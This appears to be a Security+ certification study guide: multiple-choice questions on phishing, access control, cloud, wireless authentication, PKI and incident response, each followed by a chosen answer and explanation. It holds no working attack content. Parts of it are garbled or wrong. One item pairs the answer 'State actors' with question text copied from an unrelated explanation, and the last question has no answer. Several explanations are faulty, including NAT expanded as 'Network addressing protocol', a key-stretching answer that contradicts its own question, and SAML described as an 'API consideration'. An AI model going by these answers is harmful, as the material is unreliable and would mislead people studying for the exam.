SECURITY+ STUDY GUIDE #2

A user receives multiple emails daily from various vendors and companies. The emails seem legitimate but are overly excessive. What is the user most likely receiving? -SPIM threats -Spam advertisements -Vishing messages -SMiShing texts

Spam advertisements Spam or unsolicited messages via email are sent in bulk to users for advertisements or to deliver malware.

A user receives access to a company system through the use of a smart card. The user can then access data they have privileges to access. A record of all events the user accomplishes or attempts to is recorded in a log for administrative purposes. What access management policy does this best describe? -MAC -DAC -AAA -Group based

AAA Authentication, Authorization, and Accounting (AAA) provides a comprehensive access management approach to identifying, authorizing, and accounting for user activity.

A company leases access to resources from a service provider as agreed upon in a service level agreement. The company pays only for what is used on a monthly basis. Which of the following computing concepts is being used? -Community cloud -Cloud computing -PaaS -On-premise

Cloud computing In cloud computing, a company uses a cloud service provider to deliver computing resources. A cloud-based server utilizes virtual technology to host a company's applications offsite.

A user at a company executes a program that displays a threatening message. The message says "files on the computer will remain encrypted until bitcoin is paid to a virtual wallet." Which of the following best describes this type of infection? -A logic bomb -A mine -Crypto-malware -A worm

Crypto-malware Ransomware is a type of Trojan malware that extorts money from the victim. The computer remains locked until the user pays the ransom. Crypto-malware is ransomware that attempts to encrypt data files. The user will be unable to access the files without the private encryption key.

The local operational network consists of physical electromechanical components controlling valves, motors, and electrical switches. All devices enterprise-wide trust each other in the internal network. Which of the following attacks could overwhelm the network by targeting vulnerabilities in the headers of specific application protocols? -DNS amplification attack -DDoS attack -Malicious PowerShell attack -Man-in-the-middle attack

DNS amplification attack Domain name system (DNS) amplification attack is an application attack that targets vulnerabilities in the headers and payloads of specific application protocols. It triggers a short request for a long response at the victim network.

Which of the following is the service that provisions the user account and processes authentication requests? -Token -Account attribute -Identity provider -Certificate

Identity provider The identity provider (IdP) is the service that provisions the user account and processes authentication requests. On a private network, these identity directories and application authorization services can be operated locally.

An increase in malware detection, due to certain web browsing activity in the workplace, caused the information systems security office (ISSO) to deploy a unified threat manager on the network. How would this network appliance help reduce malware on client workstations? (Select all that apply.) -Encrypt traffic -Block URLs -Scan web traffic -Block malware

-Block URLs -Scan web traffic -Block malware The UTM (Unified Threat Management) is an all-in-one security appliance. Its ability to block specific URLs or websites comes from its content filtering feature. Even unknown websites that fit the description of having inappropriate images can be set to block. Many UTM appliances include a malware scanner that scans the web traffic and compares the packet or heuristic behavior to determine if a network connection is malicious. A UTM is like an intrusion prevention system (IPS) that can block network connections or prevent a file from downloading.

Identify types of metadata that would be associated with CDR (call detail records) of mobile devices. (Select all that apply.) -Call durations -List of towers connected to -GPS location data -SMS text timestamps

-Call durations -List of towers connected to -SMS text timestamps Call detail records (CDR) routinely contain times and durations of incoming, outgoing, and attempted calls, as well as the phone numbers of said calls. By examining the list of towers a device has connected to in the call detail records (CDR), it is possible to ascertain the general vicinity of locations in which the device has been present. SMS text time, duration, and phone number of origin are recorded in the call detail records (CDR) metadata associated with mobile devices.

Which of the following will reduce the risk of data exposure between containers on a cloud platform? (Select all that apply.) -Control groups -Namespaces -Secrets management -Public subnets

-Control groups -Namespaces In a container engine such as Docker, each container is isolated from others through separate namespaces. Namespaces prevent one container from reading or writing processes in another. Control groups ensure that one container cannot overwhelm others in a DoS-type attack. Namespaces and control groups reduce the risk of data exposure between containers.

Outline possible tools or methods the team can use to acquire a disk image from a system. (Select all that apply.) -Copy disk with dd command -Save disk image with FTK Imager -Create snapshots of all volumes -Transfer file system via SMB

-Copy disk with dd command -Save disk image with FTK Imager -Create snapshots of all volumes FTK Imager is a data imaging tool that quickly assesses electronic evidence to determine if it requires further analysis. The FTK Imager can save an image of a hard disk in one file or in segments, to reconstruct later if needed. The dd command can copy an entire disk as an image to a USB thumb drive. The team can then analyze the image in a sandbox environment. It is possible to create snapshots of the compromised volumes, and in some cases, it can boot a virtual machine, as a full disk image can. This may not be the most efficient method, however.

Which of the following are common constraints of embedded systems? (Select all that apply.) -Cryptography capability -Network range -Reliability -Compute power

-Cryptography capability -Network range -Compute power Compute power is a common constraint of an embedded system. Embedded systems are relatively small and do not have the average computing capabilities as a standard computer. Authentication is a common constraint for embedded systems. Because they lack compute capacity, embedded systems cannot match the authentication technologies of a standard network. The lack of size and computing power also diminishes choices for network connectivity. Transmission Control Protocol/Internet Protocol (TCP/IP)-based networking is not up to standards with embedded systems using relatively low processing power. Embedded systems are highly stable and reliable with few interconnections.

A visiting consultant to a company fails at trying to copy a file from a shared drive to a USB flash drive. Which security solutions block the file from being copied? (Select all that apply.) -Host intrusion prevention system (HIPS) -Host intrusion detection system (HIDS) -Data loss prevention system (DLP) -Endpoint protection platform (EPP)

-Data loss prevention system (DLP) -Endpoint protection platform (EPP) Data loss prevention (DLP) is a security solution that is configured with policies to identify privileged files to prevent data from being copied or attached to a message without authorization. An endpoint protection platform (EPP) usually depends on an agent running on a local host. Agents may be installed for services such as antivirus, intrusion detection, and data loss prevention.

An administrator goes through regular tasks every morning at the office to quickly gather health metrics of the network and associated systems. The admin connects to a Windows jump server using a secure shell (SSH) to run health scripts which outputs the data to a .xls file on a local shared folder accessible to all employees. The most recent run of the health script failed immediately without any indication of the issue. If an Information System Security Officer (ISSO) examined these morning tasks, what would be considered a weak configuration? (Select all that apply.) -Unsecure remote access -Default settings -Unformatted error messages -Open permissions

-Default settings -Open permissions Open permissions can allow anyone on the network with access to files and services. Although the file share is available to internal employees, only administrators should be reviewing gathered health information. Default settings are usually unsecure settings that leave the environment and data open to compromise. A shared folder that provides access to everyone on the Internal network is an example of a default setting when shared folders are created.

What is an antivirus and anti-malware software capable of doing to protect a computer system? (Select all that apply.) -Disk encryption -Detect Trojans -Application-aware filtering -Signature-based detection

-Detect Trojans -Signature-based detection The first generation of antivirus (AV) software is characterized by signature-based detection and prevention of known viruses. Computer viruses are computer programs that replicate, when executed, by modifying and inserting themselves into other computer programs. Anti-malware is the next generation of antivirus software that can detect other malicious software such as Trojans, spyware, and even cryptojackers.

Teams of security experts are preparing for a penetration exercise using a white box environment. The activities will be monitored in an isolated environment in the company's local datacenter. What would be the appropriate rules of engagement for this exercise? (Select all that apply.) -Do not access production network. -Steal files from file server A. -Involve a cloud service provider. -Perform reconnaissance activities first.

-Do not access production network. -Steal files from file server A. Rules of engagement involve specifying the activities or goals of the exercise. A concrete objective such as "steal files from file server A" is very specific, rather than using vague descriptions like "break the network." An explicit rule to not access or perform penetration on the production network is a concrete objective. This reminds testers of the scope of the exercise which is limited to the isolated environment.

A company deployed a wireless access point and wishes to enable the Enterprise mode for secure wireless connections. The servers have certificates, but the supplicants do not. Which of the following options would fit the company's needs? (Select all that apply.) -RADIUS Federation -EAP-FAST -PEAP -EAP-MD5

-EAP-FAST -PEAP EAP-FAST (Flexible Authentication via Secure Tunneling) is Cisco's replacement for LEAP. It addresses LEAP vulnerabilities using TLS (Transport Layer Security) with PAC (Protected Access Credential) instead of certificates. PEAP (Protected Extensible Authentication Protocol) uses a server-side public key certificate to create an encrypted tunnel between the supplicant and authentication server. PEAP is an industry standard.

A group of junior systems administrators participates in an ethical hacking seminar that allows for advancement and rewards for completing challenges. Which training methods do the administrators experience? -Gamification -Role-based training -Capture the flag -Phishing simulations

-Gamification -Capture the flag Ethical hacker training programs and gamified competitions usually use Capture the Flag (CTF). Participants must complete a series of challenges that usually result in identifying a threat actor (the flag). Gamification is a learning approach that includes a fun-factor and features gaming type elements such as points, leveling up, and rewards

An organization suffers a breach and learns a lesson in the proper approach of maintaining archived data. An engineer writing a report focuses on which areas? (Select all that apply.) -Lessons learned -Response plan -Retention policies -Attack walkthrough

-Lessons learned -Retention policies A retention policy refers to the safe storage and archiving of live or backed up data. A retention policy should be a proactive measure and not a reactive one. Lessons learned address the incident and responses to identify whether procedures or systems could be improved. The need for an improved retention policy is an example.

Select the tools that do any form of network scanning, such as port scanning, IP scanning, etc. (Select all that apply.) -Netcat -Nmap -cat -ping

-Netcat -Nmap -ping Nmap is a versatile tool, allowing users to perform various types of network scans. The packet-sniffing library Npcap can be added to Nmap to provide packet sniffing and injection capability. The nc (or Netcat) command reads and writes data across network connections. Netcat can be used for things such as port scanning and fingerprinting. Ping can execute a sweep of all the IP addresses in a subnet with just a short script.

An attacker used a dumpster trunk to pick up trash at the home of a successful Chief Executive Officer (CEO). What information gathering techniques is the attacker NOT using in this case? (Select all that apply.) -Network reconnaissance -Dumpster diving -Impersonation -Credential harvesting

-Network reconnaissance -Credential harvesting Network reconnaissance involves using tools such as nmap or network mapper to gather information about network devices and computer services. Credential harvesting is a campaign specifically designed to steal account credentials, usually to sell them in the black market. This is commonly aimed at a larger target pool.

After a year of vulnerability scans, a security engineer realized that there were zero false positive cases. The application logs showed no issues with the scanning tool and reports. What type of scanning tool or configuration would result in zero false positives being reported? (Select all that apply.) -Non-credentialed scan -Credentialed scan -Intrusive tool -Non-intrusive tool

-Non-credentialed scan -Non-intrusive tool A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the operating system (OS) or application. Fewer vulnerabilities are detected, resulting in fewer false positives. A non-intrusive or passive scanning tool analyzes indirect evidence, such as the types of traffic generated by a device. Fewer vulnerabilities are detected, resulting in fewer false positives.

Which of the following is TRUE about a certificate authority (CA) in a hierarchical model as opposed to a single CA model? (Select all that apply.) -PKI collapses if CA is compromised. -Root certificate is self-signed. -Offline CA is a best practice. -Intermediate CA issue certificates.

-Offline CA is a best practice. -Intermediate CA issue certificates. Powering off the root certificate authority (CA) in a hierarchical public key infrastructure (PKI) model is a security best practice. The root CA is a high-security risk and has the potential to compromise all subordinate certificates if not powered off. The intermediate CA is a hierarchical PKI that creates and issues certificates to users. Intermediate CAs can balance their work based on areas of responsibility.

An organization suffers a breach and learns a lesson in the proper approach of maintaining archived data. An engineer writing a report focuses on which areas? (Select all that apply.) -Retention policies -Attack walkthrough -Response plan -Lessons learned

-Retention policies -Lessons learned A retention policy refers to the safe storage and archiving of live or backed up data. A retention policy should be a proactive measure and not a reactive one. Lessons learned address the incident and responses to identify whether procedures or systems could be improved. The need for an improved retention policy is an example.

Tactic, technique, or procedure (TTP) is a generalized statement of adversary behavior. Which of the following would prove TTP is found on an organization's network? (Select all that apply.) -Rogue hardware connected to switch -Unauthorized account usage -Shared data from TAXII -Vulnerability feed from an ISAC

-Rogue hardware connected to switch -Unauthorized account usage An indicator of compromise (IoC) is a residual sign that an asset or network has been attacked or is being attacked. Rogue hardware can prove the intent to penetrate the network. Logs showing the unauthorized usage of an account is an indicator of compromise. It may prove that an account has been stolen and associated services are compromised.

Failed logins or instances of denial of access to restricted files may be indicators of compromise. Suggest where records of such incidents might be found. (Select all that apply.) -Security logs -Dump files -DNS cache -Authentication logs

-Security logs -Authentication logs Windows system and security logs can provide insight on certain events, providing a timeline with who may have logged on or tried to log on to the system. Even though investigating every security and network log manually would take forever, by comparing irregularities in authentication logs (such as incomplete authentication), investigators can correlate corresponding entries.

A company purchased a few rack servers from a different vendor to try with their internal cluster. After a few months of integration failures, the company opted to remain with their previous vendor and to upgrade their other rack servers. The current commercial software will be migrated to the new rack servers. What may have caused the company to remain with their previous vendor for new rack servers? (Select all that apply.) -Disks are self-encrypting. -Vendor lacks expertise. -Servers are incompatible. -The code is unsecure.

-Vendor lacks expertise. -Servers are incompatible. Devices or software that are incompatible with other devices or software make them difficult to manage. Companies often seek compatibility factors to ensure full integration with existing assets. A vendor that lacks expertise is also unable to support deployment and other activities required for using a rack server in the environment. Customer experience is vital to future purchases.

Network administrators are configuring a demilitarized zone (DMZ) to provide Internet-facing services to customers. These admins will perform minimum configuration and security to rapidly deploy two web servers that are load balanced. Which of the following will most likely be configured in this DMZ? (Select all that apply.) -Virtual IP addresses -Bastion hosts -Zero trust -Scheduling algorithm

-Virtual IP addresses -Bastion hosts -Scheduling algorithm Bastion hosts are any servers that are configured with minimal services to run in a demilitarized zone (DMZ). A bastion host would not be configured with any data that could be a security risk to the internal network. Virtual Internet Protocol (IP) addresses are public IP addresses that are shared among a load-balanced cluster of servers. The primary node will receive traffic from the virtual IP address until the secondary node takes over. The scheduling algorithm is the code and metrics that determine which node is selected for processing each incoming request. For example, round robin. Zero trust is an advanced perimeter setup that uses continuous authentication and conditional access to mitigate privilege escalation and account compromise by threat actors.

While assisting a customer over the phone to connect a laptop to a new wireless router, the user suddenly reports it is connected. Upon further inquiry into how the connection occurred, the user stated they pushed a circular button. Analyze the situation and determine which button the user pressed, and how it functions. (Select all that apply.) -Authentication server -WPS -8-character PIN -Wireless password

-WPS -8-character PIN WPS or Wi-Fi Protected Setup works with multiple compatible devices, like a printer, where the WPS button is pushed to establish a connection. Activating WPS on the wireless router and the adapter simultaneously associates the devices using an 8-digit PIN, then associate the adapter with the access point using WPA2. The system generates a random Service Set Identifier (SSID) and Pre-shared Key (PSK).

Evaluate the attack types and determine which are used when a high-level executive is targeted via a suspicious text message. (Select all that apply.) -Whaling -Vishing -Pharming -SMiShing

-Whaling -SMiShing SMiShing refers to using simple message service (SMS) text communications with a mobile device as an attack vector. Whaling is a spear phishing attack directed specifically against upper levels of management in the organization (CEOs and other "big fish").

An Information Security Manager working for an ISP has discovered that an attacker has poisoned the DNS server cache by spamming it with recursive queries. Predict what tools the manager might use to discover whether the attacker has inserted any false records. (Select all that apply.) -tcpreplay -Memdump -dnsenum -nslookup/dig

-dnsenum -nslookup/dig The nslookup (or dig tool in Linux) can query the name records and cached records held by a server to discover whether an attacker has inserted any false records. dnsenum packages a number of tests into a single query, as well as hosting information and name records. dnsenum can try to work out the IP address ranges that are in use.

An attacker evaded antivirus detection in a Linux kernel, as multiple threads attempted to write an object at the same memory location. What type of vulnerability did the attacker use? -An integer overflow -A buffer overflow -A race condition -A pointer dereference

A race condition A race condition vulnerability occurs when multiple threads are attempting to write at the same memory location. Race conditions can deploy as an anti-virus evasion technique.

A social engineer used a phishing attack to trick users into visiting a website. Once users visit the site, a vulnerability exploit kit installs, which actively exploits vulnerabilities on the client. What type of attack did the users become a victim of? -Locally Shared Objects (LSOs) -A Man-in-the-Browser (MitB) attack -Cross-site Request Forgery (XSRF) -HTTP Response Splitting

A Man-in-the-Browser (MitB) attack A MitB attack compromises the web browser by installing malicious plug-ins, scripts, or intercepting API calls. Vulnerability exploit kits installed on a website can actively try to exploit vulnerabilities in clients browsing the site.

With no specific target in mind, and without a reasonable goal, an attacker launched an unstructured phishing attack with an attachment of a replicating computer worm. If the attacker did not fully understand how this malware worked, and just wanted to gain attention, what classification of threat actor is this person? -Organized crime -A script kiddie -Advanced Persistent Threat (APT) -Hacktivist

A script kiddie A script kiddie uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or any reasonable goal, other than gaining attention or proving technical abilities.

WPA (Wi-Fi Protected Access) fixes the security problems with WEP (Wired Equivalent Privacy) by adding TKIP (Temporal Key Integrity Protocol) to the RC4 cipher to make it stronger. TKIP fixes the checksum problem, uses a larger Initialization Vector (IV), transmits it as an encrypted hash, and adds a sequence counter to resist replay attacks. What replaced RC4/TKIP to make WPA2 significantly more secure than WPA? AES/CCMP SHA-2/IEEE 802.1x AES/IEEE 802.1x SHA-2/CCMP

AES/CCMP For WPA2, AES (Advanced Encryption Standard) deploys within CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). AES replaces RC4, and CCMP replaces TKIP. AES is for encryption, and CCMP is for message integrity.

A developer implements a single sign-on (SSO) login standard using Security Assertion Markup Language (SAML) for logging users into an application to eliminate the need for username/password credentials. This implementation is part of which of the following? -SSL/TLS -API consideration -HTTPS -URL filtering

API consideration API considerations are programming code that enables data transmission between one software product to another. It also contains the terms of this data exchange.

A new company implements a datacenter that will hold proprietary data that is output from a daily workflow. As the company has not received any funding, no risk controls are in place. How does the company approach risk during operations? -Acceptance -Transference -Avoidance -Mitigation

Acceptance Risk acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

A new administrator completed setting up an admin account on the network. The admin successfully logged on to a remote file server with the new credentials but not on a remote domain controller (DC) server. Determine the most likely cause for not being able to log in to a DC server. Account permission Access policy Disabled account Account audit

Access policy Access policies determine things such as the right to log on to a computer locally or via remote desktop, install software, change the network configuration, and so on.

An engineer outlines a data protection plan. Part of the plan covers the challenges of protecting data in various states of existence. Evaluate the data states and conclude which will require that encryption keys stay safe for the longest period of time. -In use -In motion -In transit -At rest

At rest Data at rest is a state where the data is in some type of persistent storage media. There is an encryption challenge with data at rest as the encryption keys must be kept secure for longer.

What type of attack can exploit the memory area that an application reserves for use on a server? -Directory traversal -Buffer overflow -Privilege escalation -Integer overflow

Buffer overflow A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer.

In a software as a service (SaaS) model, where the organization is responsible for the security and patching of the application and its components, which entity would be responsible for providing security services for the infrastructure? -CSP -CM -IAM -CASB

CSP The cloud service provider (CSP) would be responsible for the security of the infrastructure. A shared responsibility model includes both the CSP and the customer sharing security aspects of a cloud service model.

Identify the most volatile form of memory. -Hard disk -Cache -Random Access Memory (RAM) -Pagefile

Cache System cache is one of the most volatile data, similar to the CPU. This data should be captured before powering a device off.

In a particular workplace, all user actions are recorded and accounted for. Any time a resource is updated, archived, or a user has their clearance level changed, it must be approved by a root user. Users that leave, arrive, or change jobs (roles) must have their user accounts regularly recertified, and any account changes must be approved by an administrator. What are these measures known as? Job rotation Change control Separation of duties Acceptable use policy

Change control Change control of quality management systems and information technology systems is a process used to ensure that changes to the product or system are implemented in a managed and organized manner.

Which attack vector makes it possible for a threat actor to compromise a whole platform with just one account? - Social media - Supply chain - Cloud - E-mail

Cloud On a cloud platform, an attacker only needs to find one account, service, or host with weak credentials to gain access. The attacker is likely to target the accounts used to develop services in the cloud or manage cloud systems.

An IT company purchases a commercial off the shelf (COTS) product that allows for four developers to access and run the product against developed code for vulnerability and threat assessments. An IT audit indicates that five developers have accessed the product. Which of the following best describes what the company is in violation of? -Regulatory framework -Compliance/Licensing -Terms of agreement -Vendor diversity

Compliance/Licensing Software compliance and licensing is a legally binding agreement that means only using a software in accordance with the software developers' conditions of usage.

Define steganography. -Concealing messages or information within other data -Building a plan for dealing with incidents -Using a list of approved applications for security purposes -A method of containing malware

Concealing messages or information within other data Steganography obscures data by embedding it in another format. Messages can be covertly inserted into TCP packets in images by modifying specific pixels and even possibly to embed images or other data into audio files.

Differential, full, and incremental refer to which of the following when discussing backup types that will not collect open files? -SAN -Copy -Snapshot -Image

Copy A copy-based backup is a replica of an internet technology (IT) system. A copy of a system can be performed at any time to provide a system a means of backup. Copy-based backups will not copy open files.

The client wants to deploy a wireless network that uses a smart card or a certificate that can be installed on the client's PC. Which type of authentication mechanism is most suitable for this task? -EAP-TLS -EAP-TTLS -EAP-FAST -PEAP

EAP-TLS EAP-TLS requires client certificates, but most other types of EAP can be configured to perform mutual authentication (including EAP-TTLS, PEAP with TLS, and EAP-FAST).

An unmanned aerial vehicle is equipped with a component to ensure position and movement sensors are aligned and relays information to a ground control. Which of the following computing devices does this best describe? -SoC -Microprocessor -Embedded system -Microcontroller

Embedded system An embedded system is a combination of hardware and software that contains a dedicated function and uses a computer component to complete the function.

A lack of which of the following measures of disorder can leave a cryptosystem vulnerable and unable to encrypt data securely? -Nonce -Longevity -Entropy -Integrity

Entropy Entropy is a measure of cryptographic unpredictability. Using high entropy sources of data provides more security than using low sources. A lack of good entropy can leave a system vulnerable.

A website uses a code generator for access to the site. Once a user enters their username, a one-time 30-second code is generated and provided through a stand-alone app. The user must enter the unique code to gain access. This is an example of which of the following cryptography methods? ECC Ephemeral Entropy Block chain

Ephemeral An ephemeral key is an asymmetric cryptographic key that is generated for each individual execution of a key establishment process. The shared secret the client token and authentication server share is combined with a counter to create a one-time password when the user wants to authenticate.

Which of the following protocols would secure file transfer services for an internal network? -FTPES -SSTP -LDAPS -DNSSEC

FTPES File Transfer Protocol Explicit Secure (FTPES) uses the AUTH TLS command to upgrade an unsecure connection established over port 21 to a secure one. This protects authentication credentials.

A hacker modified a company photo by embedding malicious code in the picture. The hacker emailed the picture to company employees, and several employees opened the email. The hacker now has remote access to those employees' computers. Which of the following can prevent this method of attack? -Protocol analyzer -Steganography -File integrity monitoring -File encryption

File integrity monitoring File integrity monitoring is a feature available in most antivirus software or HIPS (Host-based Intrusion Prevention System). HIPS can capture a baseline of the image, any radical change (like an image), using hashing algorithms, will flag the incident, and quarantine the files.

A penetration consultant has been tasked to test a company's wireless network on the fifth floor of a commercial building. The consultant is given no privileged information about the network, essentially working in a black box environment. What would the consultant most likely do first to begin the test? -Operate a C2 network. -Set rules of engagement. -Gain privileged access. -Footprint the environment.

Footprint the environment. Footprinting is a topology discovery technique that scans for hosts, IP ranges, and routes between networks to map out the structure of the target network. A WiFi scanner can be used to reveal access points (APs) in the area.

A Department of Defense (DoD) application is migrating to the cloud using Amazon Web Services (AWS) as the cloud service provider. As part of the service level agreement (SLA) and DOD mandate, the application must remain within the United States of America. AWS offers the application East, Boston and West, Oregon data centers for operations and failover. Which of the following is AWS providing in accordance with the SLA and DoD mandate? -Regulatory framework -Vendor diversity -Continuity of operations -Geographical considerations

Geographical considerations Amazon Web Services (AWS) is taking into account geographical considerations. The agreement mandates the system will stay within the United States.

An application requires continuity of operations within a 24 hour period due to the command and control capabilities it maintains. The failover site must be physically separated from the program office and be available within the required timeframe with live data. Which of the following redundancy solutions best meets the failover requirement? -Failover clusters -Recovery time objective -Meantime between failure -Geographical dispersal

Geographical dispersal Geographical dispersal is a failover consideration that replicates data in hot and warm sites physically distanced from one another in the event of a catastrophe.

An application requires continuity of operations within a 24 hour period due to the command and control capabilities it maintains. The failover site must be physically separated from the program office and be available within the required timeframe with live data. Which of the following redundancy solutions best meets the failover requirement? Failover clusters Geographical dispersal Recovery time objective Meantime between failure

Geographical dispersal Geographical dispersal is a failover consideration that replicates data in hot and warm sites physically distanced from one another in the event of a catastrophe.

Using Unified Extensible Firmware Interface (UEFI) to boot a server, the system must also provide secure boot capabilities. Part of the secure boot process requires a secure boot platform key or self-signed certificate. Determine which of the following an engineer can use to generate keys within the server using an available Peripheral Component Interconnect Express (PCIe) slot. -Hardware security module -NFC token -Trusted platform module -Password vault

Hardware security module A hardware security module (HSM) is an appliance designed to perform centralized public key infrastructure (PKI) management, key generation, or key escrow for devices. HSM can also be implemented as a plug-in PCIe adapter card to operate within a device.

A military organization is evaluating its disaster recovery plan (DRP) to assess risk and in particular identify any single points of failure. Suggest an initial action for the organizations evaluation. -Create a heat map -Assess site risk -Renew cybersecurity insurance -Identify critical systems and mission essential functions

Identify critical systems and mission essential functions Identifying critical systems and mission essential functions is often the first step of the risk management process, and will reveal any potential single points of failure.

The financial staff at an organization works with IT and management to determine the risks associated with currently deployed systems. What measure of risk results from this analysis? -Residual risk -Inherent risk -Control risk -Risk appetite

Inherent risk The result of quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.

A company provides smartphones to their employees. IT administrators have the ability to deploy, secure, and remove specific applications and data from the employees' smartphones. Analyze the selections and determine how IT can perform this type of control. Content management Storage segmentation Push notifications Baseband update

Storage segmentation Storage segmentation is personal data segmented from organizational data on a mobile device. It gives IT administrators control over corporate assets on employees' mobile devices.

A security administrator protects systems' passwords by hashing their related keys. The administrator discovers that this approach does not make the key any more difficult to crack. Analyze the different security properties and determine which one the administrator implemented. -Key exchange -Key stretching -Digital signatures -Key length

Key stretching Key stretching takes a key that is generated from a user password and repeatedly converts it to a longer and more random key. This does not make the key stronger but causes a hacker to spend more time using a reverse hashing algorithm.

When implementing a native-cloud firewall, which layer of the Open Systems Interconnection (OSI) model will require the most processing capacity to filter traffic based on content? Layer 4 Layer 7 Layer 3 Layer 1

Layer 7 At layer 7, or the application layer of the OSI model, the firewall can parse application protocol headers and payloads (such as HTTP packets) and make filtering decisions based on their contents. This requires the most processing capacity (or load balancing), or the firewall will become a bottleneck causing network latency. At layer 4, or the transport layer, the firewall will store connection states and use rules to allow established or related traffic. At layer 3, or the network layer, the firewall accepts or denies connections on the basis of IP addresses or address ranges and TCP/UDP port numbers. Layer 1 of the OSI model is the physical layer. Firewall solutions like a packet-filtering firewall start operating at layer 3.

The ARP cache stores what kind of information about recent connections? -Latency and packet loss stats -MAC addresses -Round trip time (RTT) of network hops -Packet data

MAC addresses The ARP cache displays the MAC address of the interface corresponding with each IP address recently communicated with by the local host. This can be useful for identifying Man-in-the-Middle or other spoofing attacks.

An insider threat gained access to a server room and proceeded with connecting a laptop to the network. The laptop was configured with a spoofed network interface card (NIC) address to remain undetected by the network intrusion detection (IDS) systems. What layer 2 attack can the insider threat perform to disrupt the network? -MAC flooding -OT DDoS attack -Domain hijacking -DNS poisoning

MAC flooding Media Access Control (MAC) flooding is a layer 2 network attack. It exhausts the memory used to store a MAC address table on a switch, which results in flooding unicast traffic out of all ports and disrupting all connecting devices and network services.

Two organizations plan on forming a partnership to provide systems security services. Part of the onboarding requirements for both sides includes a mutual understanding of quality management processes. Which approach details this requirement? -Non-disclosure agreement (NDA) -Business partnership agreement (BPA) -Service level agreement (SLA) -Measurement systems analysis (MSA)

Measurement systems analysis (MSA) Measurement systems analysis (MSA) relates to quality management processes, such as Six Sigma, that make use of quantified analysis methods to determine the effectiveness of a system and may be part of an onboarding requirement.

A security firm and an organization meet and agree to begin a business relationship. While a contract is not in place yet, what do the parties use to maintain confidentiality and as an intent to work together? -Measurement systems analysis (MSA) -Business partnership agreement (BPA) -Memorandum of understanding (MOU) -Service level agreement (SLA)

Memorandum of understanding (MOU) A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts.

A multinational company has partnered with several smaller, younger companies. To protect their supply chain and improve their own risk posture, the company offers to provide network security services for their new partners. Conclude what type of risk the company is addressing. -External -Legacy systems -Multiparty -Internal

Multiparty Multiparty risk occurs when an adverse event impacts multiple organizations. If a breach occurs for one party, all parties share the risk.

Systems administrators rely on ACLs to determine access to sensitive network data. What control type do the administrators implement? -Corrective -Detective -Deterrent -Preventative

Preventative Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. An ACL is an example of this control type.

What protocol alters public IP addresses to private IP addresses and vice versa, in an attempt to protect internal computers from the Internet? NAT URL Filter Firewall Proxy

NAT Network addressing protocol (NAT) translates public IP addresses to private and vice versa. By using the NAT protocol on the firewall, a company can hide assets from the public internet.

Determine a solution that can combine with a cloud access security broker (CASB) to provide a wholly cloud-hosted platform for client access? -Geo-redundant storage -On-demand machine resources -Virtual private cloud endpoint -Next-generation secure web gateway

Next-generation secure web gateway An on-premises next-generation secure web gateway (SWG) is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. Netskope is an example of an SWG product that can include a cloud access security broker (CASB).

A European company that offers subscription services has recently experienced a data breach wherein private data, including personally identifiable information (PII), was compromised. What step should be taken by the company to avoid regulatory fines or lawsuits? -Identify the vulnerability that led to the breach. -Fix the vulnerability that led to the breach. -Notify those affected by the breach. -Hide the occurrence of the breach.

Notify those affected by the breach. Many laws and regulations require immediate notification of all third parties affected by a breach, including the GDPR in the EU. Failing to do so could lead to fines and potential reputation damage.

There are several ways to check on the status of an online certificate, but some introduce privacy concerns. Consider how each of the following is structured and select the option with the best ability to hide the identity of the certificate requestor. -CRL -OCSP stapling -OCSP -OCSP responder

OCSP stapling Stapling addresses the privacy issues surrounding Online Status Certificate Protocol (OCSP) by having the SSL/TLS web server periodically obtain a time-stamped response from the Certificate Authority. Then, when a client submits an OCSP request, the web server returns the time-stamped response.

An aviation tracking system maintains flight records for equipment and personnel. The system is a critical command and control system that must maintain an availability rate of 99% for key parameter performance. The cloud service provider (CSP) guarantees a failover to multiple zones if an outage occurs. In addition to the multi-zonal cloud failover, what other backup solution could the system invest in order to maintain data locally? -Offline -Sandboxing -Control diversity -Vendor diversity

Offline An offline backup solution would be a good implementation to safeguard the systems data and have it readily available to access in the event of an outage.

An aviation tracking system maintains flight records for equipment and personnel. The system is a critical command and control system that must maintain an availability rate of 99% for key parameter performance. The cloud service provider (CSP) guarantees a failover to multiple zones if an outage occurs. In addition to the multi-zonal cloud failover, what other backup solution could the system invest in order to maintain data locally? Vendor diversity Sandboxing Control diversity Offline

Offline An offline backup solution would be a good implementation to safeguard the systems data and have it readily available to access in the event of an outage.

A file system audit shows a malicious account was able to obtain a password database. The malicious account will be able to use the information without interacting with an authentication system. What type of attack will the malicious account be able to perform on systems? Dictionary attack Password spraying attack Offline password attack Online password attack

Offline password attack An offline password attack means that the attacker has managed to obtain a database of password hashes from an Active Directory credential store, for example. A password cracker tool does not need to interact with the authentication system in this case.

Customers receive a seemingly genuine email from their trusted bank, informing them that their password needs updating. However, when authenticating, an attacker captures the customers' credentials. What kind of attack did the bank customers experience? -Whaling -SMiShing -Phishing -Vishing

Phishing Phishing is a combination of social engineering and spoofing, where the attacker sets up a spoof website to imitate a trusted one. The attacker then emails users of the genuine website, informing them that their account must be updated, supplying a disguised link that leads to their spoofed site. When users authenticate with the spoofed site, their logon credentials are captured.

Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. An ACL is an example of this control type. Hacktivists Script kiddies Criminal syndicates State actors

State actors State actors have been implicated in many attacks, particularly on energy and health network systems. They typically work at arm's length from the national government that sponsors and protects them, maintaining "plausible deniability."

Evaluate the following properties and determine which set relates to Domain Name System Security Extension (DNSSEC). -RRset, Signing key -Master key, Transport protocol -Community name, Agent -Public key, Private key

RRset, Signing key DNS Security Extensions (DNSSEC) help to mitigate spoofing and poisoning attacks. When enabled, a "package" of resource records (called an RRset) is signed with a private key (the Zone Signing Key).

A brute-force attack compromises a server in a company's data center. Security experts investigate the attack type and discover which vulnerability on the server? -Open ports and services -Unsecure protocols -Weak encryption -Default settings

